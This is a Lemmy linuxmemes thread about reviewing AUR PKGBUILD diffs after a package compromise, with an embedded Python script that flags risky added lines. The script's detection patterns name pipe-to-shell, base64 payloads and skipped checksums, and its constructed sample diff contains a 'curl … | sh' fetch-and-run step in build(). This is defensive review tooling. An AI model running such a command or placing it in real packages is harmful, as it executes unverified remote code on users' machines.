this post was submitted on 16 Jun 2026
494 points (97.9% liked)

linuxmemes

    [–] ReginaPhalange@lemmy.world 12 points 1 day ago (2 children)

    Be real for a second,
    Did you, or did you not, manage to review a diff and say "no, that looks fishy"?

    Do you really think you are immune from compromised binary AUR packages that are being downloaded straight from GitHub? Sure, now it's not only the AUR that's bad, but at the end of the day, a malicious binary did arrive at your computer.

    Let's say that you don't use *-bin packages and only download from compilable source. Are you immune from the strategy that the state actor who caused CVE-2024-3094 used to compromise packages?

    [–] tgt@programming.dev 3 points 22 hours ago

    I'm with Cubit on this one. I updated some AUR packages last week. I always do a quick skim through the PKGBUILD, and I always check the diffs with respect to my installed version. Auracle clones the git repo for the package, so it's easy to check. It takes more work and, granted, it's a reason they'll stay outdated for longer. I updated 5/34 foreign packages. The others are just not worth it to update every time. And, personally, I have had PKGBUILDs that looked fishy, forgot the functionality I needed, were badly written, had wrong dependencies, ... and, after looking for alternatives, I just rewrote them myself.

    When I learned of the attack I did go and recheck those packages, but they were not impacted... I don't do many Node things, so if a Node-related package was doing an npm install I might have missed it. But the commit author changing on the git diff I think I would have spotted. So if the attack was more sophisticated and was context-dependent, using plausible commands, setting the same git committer names, (ab)using files upstream, etc., then yeah, I might get pwned. But not like this.

    Binaries from the AUR are asking for trouble, unless you absolutely trust the upstream, e.g. Microsoft, Amazon, ... You can clearly see it in the PKGBUILD. With -git packages, you need to be doubly aware, but if I need it, the alternative is that I clone and install it myself, so not much security is gained, and probably some frustration.

    The xz attack was on a different level, and if I remember correctly, never hit the Arch main repo, by pure chance of not being a target. I trust the Arch main repos. The day a key gets stolen, a lot of people will be impacted, so let's hope this AUR thing didn't compromise more high-profile maintainers...

    Also, we're talking about the AUR, not about upstream. I'm not reading all patches on all main repo packages. And if I wanted to build everything myself I'd be using Gentoo.

    I do understand some people don't want to give the time to all these steps, but the alternative for me is just too bad. It's a time/security trade-off for which everyone sets the weights differently.
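The review routine tgt describes (skim the PKGBUILD, diff it against the installed version, notice a changed maintainer or commit author, catch things like a stray npm install) can be partly automated. The script below is an added example for this thread, not code from the thread, from Auracle or from any AUR tool: it parses a unified diff of a PKGBUILD and flags added lines a reviewer would want to read. The sample diff, the check names and the patterns are constructed for the example.

```python
"""Heuristic review of a PKGBUILD diff: flag added lines worth a closer look.

Added example for this thread; the sample diff and the check names are
constructed, not taken from any real AUR package.
"""
import re
from typing import Dict, Iterator, List, Tuple

# Each pattern is applied to lines the diff ADDS; a hit means "read this line".
RISKY_PATTERNS = {
    # downloading something at build time and executing it unseen
    "pipe-to-shell": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
    # fetching unpinned code from a language package manager during build
    "package-manager-fetch": re.compile(r"\b(npm|pip|cargo|go)\s+install\b"),
    # decoding an embedded blob is a classic way to hide a payload in plain text
    "encoded-payload": re.compile(r"\bbase64\b.*\s-d\b|\bxxd\s+-r\b"),
    # a skipped checksum removes the pin on a source (legitimate for -git sources)
    "checksum-skipped": re.compile(r"\b(md5|sha1|sha256|sha512|b2)sums=\(.*'SKIP'"),
    # writing into dotfiles in the user's home from a build/package step
    "hidden-path-write": re.compile(r"(~|\$HOME)/\."),
    # sources that are not a release archive: raw files, pastebins, bare IPs
    "raw-download-source": re.compile(
        r"https?://(raw\.githubusercontent\.com|pastebin\.com|[\d.]+)/"),
}

HUNK_RE = re.compile(r"^@@ -\d+(?:,\d+)? \+(\d+)(?:,\d+)? @@")

# Constructed sample: a version bump that also swaps the maintainer, adds an
# unpinned extra source and a pipe-to-shell step in build().
SAMPLE_DIFF = """\
diff --git a/PKGBUILD b/PKGBUILD
--- a/PKGBUILD
+++ b/PKGBUILD
@@ -1,11 +1,13 @@
-# Maintainer: Old Maintainer <old@example.org>
+# Maintainer: New Maintainer <new@example.org>
 pkgname=example-tool
-pkgver=1.2.0
+pkgver=1.2.1
 pkgrel=1
 arch=('x86_64')
-source=("https://github.com/example/example-tool/archive/v$pkgver.tar.gz")
-sha256sums=('0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef')
+source=("https://github.com/example/example-tool/archive/v$pkgver.tar.gz"
+        "https://raw.githubusercontent.com/someone/patches/main/fix.sh")
+sha256sums=('fedcba9876543210fedcba9876543210fedcba9876543210fedcba9876543210' 'SKIP')
 build() {
   cd "$pkgname-$pkgver"
   make
+  curl -s https://example.net/setup | sh
 }
"""


def added_lines(diff_text: str) -> Iterator[Tuple[int, str]]:
    """Yield (line number in the new file, text) for every line the diff adds."""
    lineno = 0  # 0 means "no hunk seen yet": file headers are skipped
    for raw in diff_text.splitlines():
        m = HUNK_RE.match(raw)
        if m:
            lineno = int(m.group(1))
            continue
        if lineno == 0:
            continue
        if raw.startswith("+"):
            yield lineno, raw[1:]
            lineno += 1
        elif raw.startswith(" ") or raw == "":
            lineno += 1  # context line; removed ('-') lines do not advance the new file


def review_pkgbuild_diff(diff_text: str) -> List[Dict[str, object]]:
    """Return one finding per (added line, matching check), ordered by line."""
    findings: List[Dict[str, object]] = []
    for lineno, text in added_lines(diff_text):
        for check, pattern in RISKY_PATTERNS.items():
            if pattern.search(text):
                findings.append({"line": lineno, "check": check, "text": text.strip()})
    return findings


def maintainer_changed(diff_text: str) -> bool:
    """True when the diff replaces the '# Maintainer:' header line."""
    lines = diff_text.splitlines()
    removed = any(line.startswith("-# Maintainer:") for line in lines)
    added = any(line.startswith("+# Maintainer:") for line in lines)
    return removed and added


if __name__ == "__main__":
    for f in review_pkgbuild_diff(SAMPLE_DIFF):
        print(f"line {f['line']:>3}  {f['check']:<22} {f['text']}")
    if maintainer_changed(SAMPLE_DIFF):
        print("maintainer line changed: compare the commit author with the package's history")
```

Feed it the output of `git diff <installed-commit> HEAD -- PKGBUILD` from the package's AUR clone. A hit is a prompt to read that line, not a verdict: 'SKIP' checksums are normal for -git sources, and a legitimate maintainer hand-over also trips the maintainer check, which is exactly the case where the commit author is worth a second look.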

    [–] CubitOom@infosec.pub 4 points 1 day ago

    "at the end of the day, a malicious binary did arrive at your computer."

    No, it didn't.